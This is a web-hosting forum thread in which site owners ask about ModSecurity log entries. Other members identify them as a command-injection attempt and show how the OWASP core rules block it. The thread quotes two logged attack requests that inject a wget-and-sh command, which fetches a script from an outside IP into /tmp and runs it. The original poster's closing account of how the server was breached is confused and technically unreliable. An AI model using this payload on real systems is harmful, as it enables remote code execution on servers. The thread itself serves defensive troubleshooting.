Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

SOLVED Entry in Mod Security Log question

Discussion in 'Security' started by webstuff, Jun 25, 2018.

Tags:
  1. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    We recently found some scripts that look pretty nasty.. Any body have any idea what this person was trying to do?

    GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

    thanks
     
  2. sktest123

    sktest123 Well-Known Member

    Joined:
    Jan 31, 2017
    Messages:
    99
    Likes Received:
    6
    Trophy Points:
    8
    Location:
    kochin
    cPanel Access Level:
    Root Administrator
    sort of command injection, via php cgi query string , seems trying to download remote shell script to tmp and execute it.
     
  3. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,214
    Likes Received:
    1,936
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    The previous post includes an accurate description of what it looks attack was attempting to do. Let us know if you have additional questions.

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    There was a security issue with a php file and tmp files were being deleted..

    I'm not sure if this helps any..

    Uptime: 123 seconds
    Executable:
    /usr/bin/php
    Command Line (often faked in exploits):
    /usr/bin/php
    Network connections by the process (if any):
    tcp: 127.0.0.1:33596 -> 127.0.0.1:3306
    tcp: 127.0.0.1:33598 -> 127.0.0.1:3306
    Files open by the process (if any):

    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error_log
    /tmp/.ZendSem.gYLBCK (deleted)
    /tmp/ZCUDi4colR (deleted)


    I have more of the log too. Any other ideas or suggestions on where to look ? I see they are trying to connect... They tried to connect 30 times today too.
     
  5. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,214
    Likes Received:
    1,936
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists?

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58

    Yes I did remove the php hole or at least I believe I did. So far I haven't seen any funky stuff but I have seen this. The only other question I have with this is.. Do you think there is any chance they could have gotten my mysql database login? In other words. When you see this sort of log I assume you wouldn't need the mysql password username correct? Or is there a possibilty. Also I can provide whatever else if you would like too. I do have some of the orgrinal files for some items. (The entire website was a complete mess. I had contacted my hosting provider talked to the security team and they kept telling me I had nothing to worry about but I just didn't buy that so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts other alerts etc..) But I do see connections like that in my mod security. Just want to be 110% sure I am not missing anything. Also I did happen to find some advance malware link I believe to where it installs a virus in the firm I believe. And if I understand everything correctly its one of those where if you wipe the drive complete format it still stays on the system. Plus there were open folders public keys etc.. I do not believe anything got changed but then again from my newbie side of details I always could be missing something. There is other stuff that isn't going on which gives me the reason to believe I got it too. I will gladly pm any details too.

    Thank you again so much for the help.

    Thank you again.
     
  7. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,214
    Likes Received:
    1,936
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello @webstuff,

    It's difficult to know for sure the extent at which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at:

    System Administration Services | cPanel Forums

    Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at:

    Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation

    Thank you.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    Yes I removed the files. In mod security its showing they where trying to connect to 127.0.0.1 Can anyone point me in the right direction on this? Its showing blocked each time.. Or any thoughts at all?
     
  9. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    ok just saw that I looked into that. haha actually some top people were hired and they said they saw nothing and it was nothing to worry about. They though it was email or some other files which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
     
  10. webstuff

    webstuff Well-Known Member

    Joined:
    Jul 19, 2011
    Messages:
    71
    Likes Received:
    1
    Trophy Points:
    58
    Just so everyone knows after digging around. I found out that there was a php script that was compromised. Turns out that the one version of php when you get it to crash correctly with the mysql it would then show the login for mysql so then hacker used the cross scripting X-fra,e options X content http strict transport etc... So they would make there script http://localhost/whatever on there machine then cross into the website with a action of post get etc.. Then they would select or inject mysql and grab sessions or hijack them that way.. Anyways after doing so much searching myself lots of lost hours me annoying web hosting companys and really no help this is what I came across.

    It was sort of upsetting because I contacted the web hosting companies security companies etc and noooooo help ... They just kept telling me its normal for that to run. And I would always say this sort of load shouldn't be going on.. Anyways after hours and hours easily 100 something reading spending with firms I finally found out it was this. Not mention the website has easilly over a million files which only makes it more difficult. But I hope this information will help others.

    Mark it closed.... As for everyone else thanking for helping and pointing me in the right direction you know who you are.
     
    cPanelMichael likes this.
  11. TheGrumpyOne

    TheGrumpyOne Registered

    Joined:
    Mar 9, 2017
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    United States
    cPanel Access Level:
    Root Administrator
    Hello,
    I am finding this string in my log file.

    "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$

    I've been getting these the last 3 weeks. Has anyone come up with a way to block this?
    I have OWASP, but I'm a noob when it comes to writing rules and don't want to screw things up.
    Thanks in advance for the Help!
     
  12. fuzzylogic

    fuzzylogic Well-Known Member

    Joined:
    Nov 8, 2014
    Messages:
    93
    Likes Received:
    51
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    You should not need to write rules for requests like these.
    I would expect the OWASP CRS to block requests like this if it is set up properly and working.

    In my test using cPanel provided rules
    OWASP ModSecurity Core Rule Set V3.0
    SpiderLabs OWASP curated ModSecurity rule set

    This request triggered the remote command injection rule ids 932105 and 932115 scoring 5 anomaly points each.

    The 10 anomaly points triggered blocking rule id 949110
    Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score.

    The 10 anomaly points triggered logging rule id 980130
    Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score.
    [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0)
    Remote Command Execution: Windows Command Injection"]
     
    cPanelMichael likes this.
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice